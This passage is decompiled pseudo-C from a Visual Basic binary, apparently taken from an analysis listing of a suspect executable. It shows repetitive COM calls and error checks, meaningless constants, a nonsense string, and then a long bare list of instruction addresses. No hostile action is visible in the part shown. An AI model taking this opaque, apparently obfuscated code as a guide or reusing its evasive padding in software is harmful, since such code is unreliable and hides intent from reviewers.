				 *((intOrPtr*)( *_a4 + 0x72c))(_a4, 0x78e34920, 0x5b07, 0x7329fe,  &_v120,  &_v300, 2,  &_v176,  &_v192, 5,  &_v132,  &_v136,  &_v140,  &_v144,  &_v152);
				_v60 = _v300;
				L0040140C();
				_v8 = 0xe;
				if( *0x413010 != 0) {
					_v620 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v620 = 0x413010;
				}
				_t1409 =  &_v132;
				L00401430();
				_v312 = _t1409;
				_t1413 =  *((intOrPtr*)( *_v312 + 0xf8))(_v312,  &_v136, _t1409,  *((intOrPtr*)( *((intOrPtr*)( *_v620)) + 0x2fc))( *_v620));
				asm("fclex");
				_v316 = _t1413;
				if(_v316 >= 0) {
					_v624 = _v624 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x403aec);
					_push(_v312);
					_push(_v316);
					L0040145A();
					_v624 = _t1413;
				}
				_push(0);
				_push(0);
				_push(_v136);
				_push( &_v176);
				L00401424();
				_t1773 = _t1772 + 0x10;
				if( *0x413010 != 0) {
					_v628 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v628 = 0x413010;
				}
				_t1418 =  &_v140;
				L00401430();
				_v320 = _t1418;
				_t1422 =  *((intOrPtr*)( *_v320 + 0x118))(_v320,  &_v276, _t1418,  *((intOrPtr*)( *((intOrPtr*)( *_v628)) + 0x2fc))( *_v628));
				asm("fclex");
				_v324 = _t1422;
				if(_v324 >= 0) {
					_v632 = _v632 & 0x00000000;
				} else {
					_push(0x118);
					_push(0x403aec);
					_push(_v320);
					_push(_v324);
					L0040145A();
					_v632 = _t1422;
				}
				if( *0x413010 != 0) {
					_v636 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v636 = 0x413010;
				}
				_t1426 =  &_v144;
				L00401430();
				_v328 = _t1426;
				_t1430 =  *((intOrPtr*)( *_v328 + 0x140))(_v328,  &_v260, _t1426,  *((intOrPtr*)( *((intOrPtr*)( *_v636)) + 0x30c))( *_v636));
				asm("fclex");
				_v332 = _t1430;
				if(_v332 >= 0) {
					_v640 = _v640 & 0x00000000;
				} else {
					_push(0x140);
					_push(0x403aec);
					_push(_v328);
					_push(_v332);
					L0040145A();
					_v640 = _t1430;
				}
				if( *0x413010 != 0) {
					_v644 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v644 = 0x413010;
				}
				_t1434 =  &_v148;
				L00401430();
				_v336 = _t1434;
				_t1438 =  *((intOrPtr*)( *_v336 + 0x68))(_v336,  &_v280, _t1434,  *((intOrPtr*)( *((intOrPtr*)( *_v644)) + 0x304))( *_v644));
				asm("fclex");
				_v340 = _t1438;
				if(_v340 >= 0) {
					_v648 = _v648 & 0x00000000;
				} else {
					_push(0x68);
					_push(0x403aec);
					_push(_v336);
					_push(_v340);
					L0040145A();
					_v648 = _t1438;
				}
				if( *0x413010 != 0) {
					_v652 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v652 = 0x413010;
				}
				_t1442 =  &_v152;
				L00401430();
				_v344 = _t1442;
				_t1446 =  *((intOrPtr*)( *_v344 + 0xf8))(_v344,  &_v156, _t1442,  *((intOrPtr*)( *((intOrPtr*)( *_v652)) + 0x2fc))( *_v652));
				asm("fclex");
				_v348 = _t1446;
				if(_v348 >= 0) {
					_v656 = _v656 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x403aec);
					_push(_v344);
					_push(_v348);
					L0040145A();
					_v656 = _t1446;
				}
				_push(0);
				_push(0);
				_push(_v156);
				_push( &_v192);
				L00401424();
				_t1774 = _t1773 + 0x10;
				if( *0x413010 != 0) {
					_v660 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v660 = 0x413010;
				}
				_t1451 =  &_v160;
				L00401430();
				_v352 = _t1451;
				_t1455 =  *((intOrPtr*)( *_v352 + 0xa0))(_v352,  &_v264, _t1451,  *((intOrPtr*)( *((intOrPtr*)( *_v660)) + 0x308))( *_v660));
				asm("fclex");
				_v356 = _t1455;
				if(_v356 >= 0) {
					_v664 = _v664 & 0x00000000;
				} else {
					_push(0xa0);
					_push(0x403aec);
					_push(_v352);
					_push(_v356);
					L0040145A();
					_v664 = _t1455;
				}
				L004013EE();
				_v268 = _v260;
				_v288 = _v276;
				_t1458 =  &_v176;
				L004013FA();
				_v284 = _t1458;
				_t1460 =  &_v192;
				L004013FA();
				 *((intOrPtr*)( *_a4 + 0x730))(_a4, 0x361c8d,  &_v284, 0x90f51c30, 0x5af5,  &_v288,  &_v268,  &_v120, L"adkomsthavers", _v280, _t1460, _t1460, _v264,  &_v208, _t1458);
				L004013F4();
				L0040140C();
				_push( &_v156);
				_push( &_v136);
				_push( &_v160);
				_push( &_v152);
				_push( &_v148);
				_push( &_v144);
				_push( &_v140);
				_push( &_v132);
				_push(8);
				L00401406();
				_push( &_v192);
				_push( &_v176);
				_push(2);
				L00401400();
				_t1776 = _t1774 + 0x30;
				_v8 = 0xf;
				if( *0x413010 != 0) {
					_v668 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v668 = 0x413010;
				}
				_t1481 =  &_v132;
				L00401430();
				_v312 = _t1481;
				_t1485 =  *((intOrPtr*)( *_v312 + 0xa0))(_v312,  &_v260, _t1481,  *((intOrPtr*)( *((intOrPtr*)( *_v668)) + 0x2fc))( *_v668));
				asm("fclex");
				_v316 = _t1485;
				if(_v316 >= 0) {
					_v672 = _v672 & 0x00000000;
				} else {
					_push(0xa0);
					_push(0x403aec);
					_push(_v312);
					_push(_v316);
					L0040145A();
					_v672 = _t1485;
				}
				if( *0x413010 != 0) {
					_v676 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v676 = 0x413010;
				}
				_t1489 =  &_v136;
				L00401430();
				_v320 = _t1489;
				_t1493 =  *((intOrPtr*)( *_v320 + 0xf8))(_v320,  &_v140, _t1489,  *((intOrPtr*)( *((intOrPtr*)( *_v676)) + 0x30c))( *_v676));
				asm("fclex");
				_v324 = _t1493;
				if(_v324 >= 0) {
					_v680 = _v680 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x403aec);
					_push(_v320);
					_push(_v324);
					L0040145A();
					_v680 = _t1493;
				}
				if( *0x413010 != 0) {
					_v684 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v684 = 0x413010;
				}
				_t1497 =  &_v144;
				L00401430();
				_v328 = _t1497;
				_t1501 =  *((intOrPtr*)( *_v328 + 0x78))(_v328,  &_v276, _t1497,  *((intOrPtr*)( *((intOrPtr*)( *_v684)) + 0x308))( *_v684));
				asm("fclex");
				_v332 = _t1501;
				if(_v332 >= 0) {
					_v688 = _v688 & 0x00000000;
				} else {
					_push(0x78);
					_push(0x403aec);
					_push(_v328);
					_push(_v332);
					L0040145A();
					_v688 = _t1501;
				}
				_v300 =  *0x4011d0;
				_v248 = 0x358644;
				_v256 = 3;
				_v280 = _v276;
				_v408 = _v140;
				_v140 = _v140 & 0x00000000;
				_v168 = _v408;
				_v176 = 9;
				_v264 = _v260;
				_v232 = 0x68c4b;
				_v240 = 3;
				_v216 = 0x3e5b6f;
				_v224 = 3;
				L004012E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004012E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004012E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t1515 =  *((intOrPtr*)( *_a4 + 0x710))(_a4, 0x10, 0x10,  &_v264,  &_v176, 0x7c207e50, 0x5afd,  &_v280, 0x10,  &_v300,  &_v308);
				_v336 = _t1515;
				if(_v336 >= 0) {
					_v692 = _v692 & 0x00000000;
				} else {
					_push(0x710);
					_push(0x403928);
					_push(_a4);
					_push(_v336);
					L0040145A();
					_v692 = _t1515;
				}
				_v52 = _v308;
				_v48 = _v304;
				_push( &_v144);
				_push( &_v136);
				_push( &_v132);
				_push(3);
				L00401406();
				_t1777 = _t1776 + 0x10;
				L0040143C();
				_v8 = 0x10;
				if( *0x413010 != 0) {
					_v696 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v696 = 0x413010;
				}
				_t1524 =  &_v132;
				L00401430();
				_v312 = _t1524;
				_t1528 =  *((intOrPtr*)( *_v312 + 0x178))(_v312,  &_v260, _t1524,  *((intOrPtr*)( *((intOrPtr*)( *_v696)) + 0x308))( *_v696));
				asm("fclex");
				_v316 = _t1528;
				if(_v316 >= 0) {
					_v700 = _v700 & 0x00000000;
				} else {
					_push(0x178);
					_push(0x403aec);
					_push(_v312);
					_push(_v316);
					L0040145A();
					_v700 = _t1528;
				}
				if( *0x413010 != 0) {
					_v704 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v704 = 0x413010;
				}
				_t1712 =  *((intOrPtr*)( *_v704));
				_t1532 =  &_v136;
				L00401430();
				_v320 = _t1532;
				_t1536 =  *((intOrPtr*)( *_v320 + 0x118))(_v320,  &_v276, _t1532,  *((intOrPtr*)(_t1712 + 0x30c))( *_v704));
				asm("fclex");
				_v324 = _t1536;
				if(_v324 >= 0) {
					_v708 = _v708 & 0x00000000;
				} else {
					_push(0x118);
					_push(0x403aec);
					_push(_v320);
					_push(_v324);
					L0040145A();
					_v708 = _t1536;
				}
				_v268 = 0x5633;
				_v264 = 0x44d0;
				_v168 = 0x48a00a;
				_v176 = 3;
				 *_t1777 =  *0x4011c8;
				_t1543 =  *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v176, _t1712, _t1712,  &_v264, _v260,  &_v268, _v276,  &_v272);
				_v328 = _t1543;
				if(_v328 >= 0) {
					_v712 = _v712 & 0x00000000;
				} else {
					_push(0x714);
					_push(0x403928);
					_push(_a4);
					_push(_v328);
					L0040145A();
					_v712 = _t1543;
				}
				_v44 = _v272;
				_push( &_v136);
				_push( &_v132);
				_push(2);
				L00401406();
				_t1778 = _t1777 + 0xc;
				L0040143C();
				_v8 = 0x11;
				if( *0x413010 != 0) {
					_v716 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v716 = 0x413010;
				}
				_t1550 =  &_v132;
				L00401430();
				_v312 = _t1550;
				_t1554 =  *((intOrPtr*)( *_v312 + 0x78))(_v312,  &_v276, _t1550,  *((intOrPtr*)( *((intOrPtr*)( *_v716)) + 0x300))( *_v716));
				asm("fclex");
				_v316 = _t1554;
				if(_v316 >= 0) {
					_v720 = _v720 & 0x00000000;
				} else {
					_push(0x78);
					_push(0x403aec);
					_push(_v312);
					_push(_v316);
					L0040145A();
					_v720 = _t1554;
				}
				if( *0x413010 != 0) {
					_v724 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v724 = 0x413010;
				}
				_t1558 =  &_v136;
				L00401430();
				_v320 = _t1558;
				_t1562 =  *((intOrPtr*)( *_v320 + 0x60))(_v320,  &_v280, _t1558,  *((intOrPtr*)( *((intOrPtr*)( *_v724)) + 0x30c))( *_v724));
				asm("fclex");
				_v324 = _t1562;
				if(_v324 >= 0) {
					_v728 = _v728 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x403aec);
					_push(_v320);
					_push(_v324);
					L0040145A();
					_v728 = _t1562;
				}
				_v292 = _v280;
				_v288 = 0x855264;
				_v284 = _v276;
				_t1720 =  &_v120;
				L004013EE();
				 *_t1778 =  *0x4011c0;
				_t1570 =  *((intOrPtr*)( *_a4 + 0x718))(_a4, _t1720, _t1720,  &_v120,  &_v284,  &_v288, 0x9ec81,  &_v292);
				_v328 = _t1570;
				if(_v328 >= 0) {
					_v732 = _v732 & 0x00000000;
				} else {
					_push(0x718);
					_push(0x403928);
					_push(_a4);
					_push(_v328);
					L0040145A();
					_v732 = _t1570;
				}
				L0040140C();
				L00401406();
				_v8 = 0x12;
				L004013E8();
				_v8 = 0x13;
				_t1575 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4, 0xffffffff, 2,  &_v132,  &_v136);
				asm("fclex");
				_v312 = _t1575;
				if(_v312 >= 0) {
					_v736 = _v736 & 0x00000000;
				} else {
					_push(0x2b4);
					_push(0x4038f8);
					_push(_a4);
					_push(_v312);
					L0040145A();
					_v736 = _t1575;
				}
				while(1) {
					_v8 = 0x15;
					_v40 = _v40 + 1;
					_v8 = 0x16;
					if(_v40 > 1) {
						break;
					}
				}
				_v8 = 0x1a;
				E00411AEF();
				_v8 = 0x1b;
				_v40 = 2;
				_v8 = 0x1c;
				_v96 = 0x8083c2;
				_v8 = 0x1d;
				asm("cdq");
				_t1583 =  *((intOrPtr*)( *_a4 + 0x71c))(_a4, _v96 / _v40);
				_v20 = 0;
				asm("wait");
				_push(0x410cd4);
				L0040143C();
				L0040143C();
				return _t1583;
			}












































































































































































































































































                              0x0040e60d
                              0x0040e61c
                              0x0040e628
                              0x0040e630
                              0x0040e633
                              0x0040e640
                              0x0040e649
                              0x0040e64c
                              0x0040e65b
                              0x0040e65e
                              0x0040e665
                              0x0040e672
                              0x0040e673
                              0x0040e678
                              0x0040e682
                              0x0040e692
                              0x0040e693
                              0x0040e699
                              0x0040e69a
                              0x0040e69f
                              0x0040e6a6
                              0x0040e6ac
                              0x0040e6ba
                              0x0040e6c0
                              0x0040e6ce
                              0x0040e6eb
                              0x0040e6d0
                              0x0040e6d0
                              0x0040e6d5
                              0x0040e6da
                              0x0040e6df
                              0x0040e6df
                              0x0040e70f
                              0x0040e713
                              0x0040e718
                              0x0040e730
                              0x0040e736
                              0x0040e738
                              0x0040e745
                              0x0040e76a
                              0x0040e747
                              0x0040e747
                              0x0040e74c
                              0x0040e751
                              0x0040e757
                              0x0040e75d
                              0x0040e762
                              0x0040e762
                              0x0040e774
                              0x0040e77a
                              0x0040e784
                              0x0040e78a
                              0x0040e79a
                              0x0040e79b
                              0x0040e7a3
                              0x0040e7a8
                              0x0040e7ae
                              0x0040e7ae
                              0x0040e7b3
                              0x0040e7ba
                              0x0040e7c4
                              0x0040e7ce
                              0x0040e7d8
                              0x0040e7e2
                              0x0040e7f3
                              0x0040e7f9
                              0x0040e806
                              0x0040e807
                              0x0040e808
                              0x0040e809
                              0x0040e825
                              0x0040e82b
                              0x0040e838
                              0x0040e85a
                              0x0040e83a
                              0x0040e83a
                              0x0040e83f
                              0x0040e844
                              0x0040e847
                              0x0040e84d
                              0x0040e852
                              0x0040e852
                              0x0040e867
                              0x0040e86c
                              0x0040e882
                              0x0040e88e
                              0x0040e891
                              0x0040e89f
                              0x0040e8bc
                              0x0040e8a1
                              0x0040e8a1
                              0x0040e8a6
                              0x0040e8ab
                              0x0040e8b0
                              0x0040e8b0
                              0x0040e8e0
                              0x0040e8e4
                              0x0040e8e9
                              0x0040e904
                              0x0040e907
                              0x0040e909
                              0x0040e916
                              0x0040e938
                              0x0040e918
                              0x0040e918
                              0x0040e91a
                              0x0040e91f
                              0x0040e925
                              0x0040e92b
                              0x0040e930
                              0x0040e930
                              0x0040e946
                              0x0040e963
                              0x0040e948
                              0x0040e948
                              0x0040e94d
                              0x0040e952
                              0x0040e957
                              0x0040e957
                              0x0040e987
                              0x0040e98e
                              0x0040e993
                              0x0040e9ae
                              0x0040e9b4
                              0x0040e9b6
                              0x0040e9c3
                              0x0040e9e8
                              0x0040e9c5
                              0x0040e9c5
                              0x0040e9ca
                              0x0040e9cf
                              0x0040e9d5
                              0x0040e9db
                              0x0040e9e0
                              0x0040e9e0
                              0x0040e9ef
                              0x0040e9f1
                              0x0040e9f3
                              0x0040e9ff
                              0x0040ea00
                              0x0040ea05
                              0x0040ea0f
                              0x0040ea2c
                              0x0040ea11
                              0x0040ea11
                              0x0040ea16
                              0x0040ea1b
                              0x0040ea20
                              0x0040ea20
                              0x0040ea50
                              0x0040ea57
                              0x0040ea5c
                              0x0040ea77
                              0x0040ea7d
                              0x0040ea7f
                              0x0040ea8c
                              0x0040eab1
                              0x0040ea8e
                              0x0040ea8e
                              0x0040ea93
                              0x0040ea98
                              0x0040ea9e
                              0x0040eaa4
                              0x0040eaa9
                              0x0040eaa9
                              0x0040eabe
                              0x0040eac4
                              0x0040ead5
                              0x0040eadf
                              0x0040eaea
                              0x0040eaf0
                              0x0040eafa
                              0x0040eb0a
                              0x0040eb10
                              0x0040eb21
                              0x0040eb39
                              0x0040eb4b
                              0x0040eb67
                              0x0040eb70
                              0x0040eb7b
                              0x0040eb82
                              0x0040eb89
                              0x0040eb8d
                              0x0040eb8e
                              0x0040eb90
                              0x0040eb9e
                              0x0040eba5
                              0x0040eba6
                              0x0040eba8
                              0x0040ebad
                              0x0040ebb0
                              0x0040ebbe
                              0x0040ebdb
                              0x0040ebc0
                              0x0040ebc0
                              0x0040ebc5
                              0x0040ebca
                              0x0040ebcf
                              0x0040ebcf
                              0x0040ebff
                              0x0040ec03
                              0x0040ec08
                              0x0040ec23
                              0x0040ec29
                              0x0040ec2b
                              0x0040ec38
                              0x0040ec5d
                              0x0040ec3a
                              0x0040ec3a
                              0x0040ec3f
                              0x0040ec44
                              0x0040ec4a
                              0x0040ec50
                              0x0040ec55
                              0x0040ec55
                              0x0040ec64
                              0x0040ec66
                              0x0040ec68
                              0x0040ec74
                              0x0040ec75
                              0x0040ec7a
                              0x0040ec84
                              0x0040eca1
                              0x0040ec86
                              0x0040ec86
                              0x0040ec8b
                              0x0040ec90
                              0x0040ec95
                              0x0040ec95
                              0x0040ecc5
                              0x0040eccc
                              0x0040ecd1
                              0x0040ece9
                              0x0040ecef
                              0x0040ecf1
                              0x0040ecfe
                              0x0040ed23
                              0x0040ed00
                              0x0040ed00
                              0x0040ed05
                              0x0040ed0a
                              0x0040ed10
                              0x0040ed16
                              0x0040ed1b
                              0x0040ed1b
                              0x0040ed31
                              0x0040ed4e
                              0x0040ed33
                              0x0040ed33
                              0x0040ed38
                              0x0040ed3d
                              0x0040ed42
                              0x0040ed42
                              0x0040ed72
                              0x0040ed79
                              0x0040ed7e
                              0x0040ed99
                              0x0040ed9f
                              0x0040eda1
                              0x0040edae
                              0x0040edd3
                              0x0040edb0
                              0x0040edb0
                              0x0040edb5
                              0x0040edba
                              0x0040edc0
                              0x0040edc6
                              0x0040edcb
                              0x0040edcb
                              0x0040edda
                              0x0040eddc
                              0x0040edde
                              0x0040edea
                              0x0040edeb
                              0x0040edf0
                              0x0040edfa
                              0x0040ee17
                              0x0040edfc
                              0x0040edfc
                              0x0040ee01
                              0x0040ee06
                              0x0040ee0b
                              0x0040ee0b
                              0x0040ee3b
                              0x0040ee42
                              0x0040ee47
                              0x0040ee5f
                              0x0040ee65
                              0x0040ee67
                              0x0040ee74
                              0x0040ee99
                              0x0040ee76
                              0x0040ee76
                              0x0040ee7b
                              0x0040ee80
                              0x0040ee86
                              0x0040ee8c
                              0x0040ee91
                              0x0040ee91
                              0x0040eea7
                              0x0040eec4
                              0x0040eea9
                              0x0040eea9
                              0x0040eeae
                              0x0040eeb3
                              0x0040eeb8
                              0x0040eeb8
                              0x0040eee8
                              0x0040eeef
                              0x0040eef4
                              0x0040ef0f
                              0x0040ef15
                              0x0040ef17
                              0x0040ef24
                              0x0040ef49
                              0x0040ef26
                              0x0040ef26
                              0x0040ef2b
                              0x0040ef30
                              0x0040ef36
                              0x0040ef3c
                              0x0040ef41
                              0x0040ef41
                              0x0040ef56
                              0x0040ef5c
                              0x0040ef69
                              0x0040ef6f
                              0x0040ef7c
                              0x0040ef81
                              0x0040ef88
                              0x0040ef8d
                              0x0040ef96
                              0x0040ef9c
                              0x0040efa6
                              0x0040efac
                              0x0040efb6
                              0x0040efbd
                              0x0040efc2
                              0x0040efc8
                              0x0040efd2
                              0x0040f006
                              0x0040f013
                              0x0040f014
                              0x0040f015
                              0x0040f016
                              0x0040f02e
                              0x0040f034
                              0x0040f041
                              0x0040f063
                              0x0040f043
                              0x0040f043
                              0x0040f048
                              0x0040f04d
                              0x0040f050
                              0x0040f056
                              0x0040f05b
                              0x0040f05b
                              0x0040f06d
                              0x0040f078
                              0x0040f07f
                              0x0040f086
                              0x0040f08d
                              0x0040f094
                              0x0040f09b
                              0x0040f09f
                              0x0040f0a0
                              0x0040f0a2
                              0x0040f0b0
                              0x0040f0b7
                              0x0040f0be
                              0x0040f0bf
                              0x0040f0c1
                              0x0040f0c6
                              0x0040f0c9
                              0x0040f0d7
                              0x0040f0f4
                              0x0040f0d9
                              0x0040f0d9
                              0x0040f0de
                              0x0040f0e3
                              0x0040f0e8
                              0x0040f0e8
                              0x0040f118
                              0x0040f11c
                              0x0040f121
                              0x0040f13c
                              0x0040f13f
                              0x0040f141
                              0x0040f14e
                              0x0040f170
                              0x0040f150
                              0x0040f150
                              0x0040f152
                              0x0040f157
                              0x0040f15d
                              0x0040f163
                              0x0040f168
                              0x0040f168
                              0x0040f17e
                              0x0040f19b
                              0x0040f180
                              0x0040f180
                              0x0040f185
                              0x0040f18a
                              0x0040f18f
                              0x0040f18f
                              0x0040f1bf
                              0x0040f1c6
                              0x0040f1cb
                              0x0040f1e6
                              0x0040f1e9
                              0x0040f1eb
                              0x0040f1f8
                              0x0040f21a
                              0x0040f1fa
                              0x0040f1fa
                              0x0040f1fc
                              0x0040f201
                              0x0040f207
                              0x0040f20d
                              0x0040f212
                              0x0040f212
                              0x0040f228
                              0x0040f245
                              0x0040f22a
                              0x0040f22a
                              0x0040f22f
                              0x0040f234
                              0x0040f239
                              0x0040f239
                              0x0040f269
                              0x0040f270
                              0x0040f275
                              0x0040f290
                              0x0040f296
                              0x0040f298
                              0x0040f2a5
                              0x0040f2ca
                              0x0040f2a7
                              0x0040f2a7
                              0x0040f2ac
                              0x0040f2b1
                              0x0040f2b7
                              0x0040f2bd
                              0x0040f2c2
                              0x0040f2c2
                              0x0040f2d8
                              0x0040f2f5
                              0x0040f2da
                              0x0040f2da
                              0x0040f2df
                              0x0040f2e4
                              0x0040f2e9
                              0x0040f2e9
                              0x0040f319
                              0x0040f320
                              0x0040f325
                              0x0040f340
                              0x0040f346
                              0x0040f348
                              0x0040f355
                              0x0040f37a
                              0x0040f357
                              0x0040f357
                              0x0040f35c
                              0x0040f361
                              0x0040f367
                              0x0040f36d
                              0x0040f372
                              0x0040f372
                              0x0040f381
                              0x0040f383
                              0x0040f385
                              0x0040f391
                              0x0040f392
                              0x0040f397
                              0x0040f3a1
                              0x0040f3be
                              0x0040f3a3
                              0x0040f3a3
                              0x0040f3a8
                              0x0040f3ad
                              0x0040f3b2
                              0x0040f3b2
                              0x0040f3e2
                              0x0040f3e9
                              0x0040f3ee
                              0x0040f409
                              0x0040f40f
                              0x0040f411
                              0x0040f41e
                              0x0040f443
                              0x0040f420
                              0x0040f420
                              0x0040f425
                              0x0040f42a
                              0x0040f430
                              0x0040f436
                              0x0040f43b
                              0x0040f43b
                              0x0040f451
                              0x0040f46e
                              0x0040f453
                              0x0040f453
                              0x0040f458
                              0x0040f45d
                              0x0040f45e
                              0x0040f462
                              0x0040f462
                              0x0040f492
                              0x0040f499
                              0x0040f49e
                              0x0040f4b9
                              0x0040f4bf
                              0x0040f4c1
                              0x0040f4ce
                              0x0040f4f3
                              0x0040f4d0
                              0x0040f4d0
                              0x0040f4d5
                              0x0040f4da
                              0x0040f4e0
                              0x0040f4e6
                              0x0040f4eb
                              0x0040f4eb
                              0x0040f500
                              0x0040f506
                              0x0040f516
                              0x0040f51c
                              0x0040f526
                              0x0040f530
                              0x0040f53a
                              0x0040f544
                              0x0040f562
                              0x0040f569
                              0x0040f573
                              0x0040f583
                              0x0040f590
                              0x0040f591
                              0x0040f592
                              0x0040f593
                              0x0040f5af
                              0x0040f5b5
                              0x0040f5c2
                              0x0040f5e4
                              0x0040f5c4
                              0x0040f5c4
                              0x0040f5c9
                              0x0040f5ce
                              0x0040f5d1
                              0x0040f5d7
                              0x0040f5dc
                              0x0040f5dc
                              0x0040f5f2
                              0x0040f5f9
                              0x0040f62e
                              0x0040f64d
                              0x0040f652
                              0x0040f655
                              0x0040f66b
                              0x0040f671
                              0x0040f67e
                              0x0040f6a0
                              0x0040f680
                              0x0040f680
                              0x0040f685
                              0x0040f68a
                              0x0040f68d
                              0x0040f693
                              0x0040f698
                              0x0040f698
                              0x0040f6ad
                              0x0040f6b0
                              0x0040f6be
                              0x0040f6db
                              0x0040f6c0
                              0x0040f6c0
                              0x0040f6c5
                              0x0040f6ca
                              0x0040f6cf
                              0x0040f6cf
                              0x0040f6ff
                              0x0040f703
                              0x0040f708
                              0x0040f723
                              0x0040f729
                              0x0040f72b
                              0x0040f738
                              0x0040f75d
                              0x0040f73a
                              0x0040f73a
                              0x0040f73f
                              0x0040f744
                              0x0040f74a
                              0x0040f750
                              0x0040f755
                              0x0040f755
                              0x0040f76b
                              0x0040f788
                              0x0040f76d
                              0x0040f76d
                              0x0040f772
                              0x0040f777
                              0x0040f77c
                              0x0040f77c
                              0x0040f7ac
                              0x0040f7b3
                              0x0040f7b8
                              0x0040f7d3
                              0x0040f7d9
                              0x0040f7db
                              0x0040f7e8
                              0x0040f80d
                              0x0040f7ea
                              0x0040f7ea
                              0x0040f7ef
                              0x0040f7f4
                              0x0040f7fa
                              0x0040f800
                              0x0040f805
                              0x0040f805
                              0x0040f81b
                              0x0040f838
                              0x0040f81d
                              0x0040f81d
                              0x0040f822
                              0x0040f827
                              0x0040f82c
                              0x0040f82c
                              0x0040f85c
                              0x0040f863
                              0x0040f868
                              0x0040f880
                              0x0040f883
                              0x0040f885
                              0x0040f892
                              0x0040f8b4
                              0x0040f894
                              0x0040f894
                              0x0040f896
                              0x0040f89b
                              0x0040f8a1
                              0x0040f8a7
                              0x0040f8ac
                              0x0040f8ac
                              0x0040f8be
                              0x0040f8c4
                              0x0040f8ce
                              0x0040f8d4
                              0x0040f8e5
                              0x0040f8ef
                              0x0040f8fc
                              0x0040f8fd
                              0x0040f8fe
                              0x0040f8ff
                              0x0040f915
                              0x0040f91b
                              0x0040f928
                              0x0040f94a
                              0x0040f92a
                              0x0040f92a
                              0x0040f92f
                              0x0040f934
                              0x0040f937
                              0x0040f93d
                              0x0040f942
                              0x0040f942
                              0x0040f957
                              0x0040f95e
                              0x0040f962
                              0x0040f963
                              0x0040f965
                              0x0040f96a
                              0x0040f973
                              0x0040f978
                              0x0040f986
                              0x0040f9a3
                              0x0040f988
                              0x0040f988
                              0x0040f98d
                              0x0040f992
                              0x0040f997
                              0x0040f997
                              0x0040f9c7
                              0x0040f9cb
                              0x0040f9d0
                              0x0040f9eb
                              0x0040f9f1
                              0x0040f9f3
                              0x0040fa00
                              0x0040fa25
                              0x0040fa02
                              0x0040fa02
                              0x0040fa07
                              0x0040fa0c
                              0x0040fa12
                              0x0040fa18
                              0x0040fa1d
                              0x0040fa1d
                              0x0040fa33
                              0x0040fa50
                              0x0040fa35
                              0x0040fa35
                              0x0040fa3a
                              0x0040fa3f
                              0x0040fa44
                              0x0040fa44
                              0x0040fa74
                              0x0040fa7b
                              0x0040fa80
                              0x0040fa98
                              0x0040fa9b
                              0x0040fa9d
                              0x0040faaa
                              0x0040facc
                              0x0040faac
                              0x0040faac
                              0x0040faae
                              0x0040fab3
                              0x0040fab9
                              0x0040fabf
                              0x0040fac4
                              0x0040fac4
                              0x0040fada
                              0x0040faf7
                              0x0040fadc
                              0x0040fadc
                              0x0040fae1
                              0x0040fae6
                              0x0040faeb
                              0x0040faeb
                              0x0040fb1b
                              0x0040fb22
                              0x0040fb27
                              0x0040fb42
                              0x0040fb45
                              0x0040fb47
                              0x0040fb54
                              0x0040fb76
                              0x0040fb56
                              0x0040fb56
                              0x0040fb58
                              0x0040fb5d
                              0x0040fb63
                              0x0040fb69
                              0x0040fb6e
                              0x0040fb6e
                              0x0040fb84
                              0x0040fba1
                              0x0040fb86
                              0x0040fb86
                              0x0040fb8b
                              0x0040fb90
                              0x0040fb95
                              0x0040fb95
                              0x0040fbc5
                              0x0040fbcc
                              0x0040fbd1
                              0x0040fbec
                              0x0040fbf2
                              0x0040fbf4
                              0x0040fc01
                              0x0040fc26
                              0x0040fc03
                              0x0040fc03
                              0x0040fc08
                              0x0040fc0d
                              0x0040fc13
                              0x0040fc19
                              0x0040fc1e
                              0x0040fc1e
                              0x0040fc34
                              0x0040fc51
                              0x0040fc36
                              0x0040fc36
                              0x0040fc3b
                              0x0040fc40
                              0x0040fc45
                              0x0040fc45
                              0x0040fc6b
                              0x0040fc75
                              0x0040fc7c
                              0x0040fc81
                              0x0040fc99
                              0x0040fc9f
                              0x0040fca1
                              0x0040fcae
                              0x0040fcd3
                              0x0040fcb0
                              0x0040fcb0
                              0x0040fcb5
                              0x0040fcba
                              0x0040fcc0
                              0x0040fcc6
                              0x0040fccb
                              0x0040fccb
                              0x0040fcdd
                              0x0040fce3
                              0x0040fced
                              0x0040fcf3
                              0x0040fd03
                              0x0040fd09
                              0x0040fd16
                              0x0040fd1c
                              0x0040fd26
                              0x0040fd36
                              0x0040fd57
                              0x0040fd64
                              0x0040fd65
                              0x0040fd66
                              0x0040fd67
                              0x0040fd7d
                              0x0040fd92
                              0x0040fd98
                              0x0040fda5
                              0x0040fdc7
                              0x0040fda7
                              0x0040fda7
                              0x0040fdac
                              0x0040fdb1
                              0x0040fdb4
                              0x0040fdba
                              0x0040fdbf
                              0x0040fdbf
                              0x0040fdd7
                              0x0040fddf
                              0x0040fe06
                              0x0040fe1e
                              0x0040fe23
                              0x0040fe26
                              0x0040fe35
                              0x0040fe5c
                              0x0040fe68
                              0x0040fe6e
                              0x0040fe73
                              0x0040fe81
                              0x0040fe9e
                              0x0040fe83
                              0x0040fe83
                              0x0040fe88
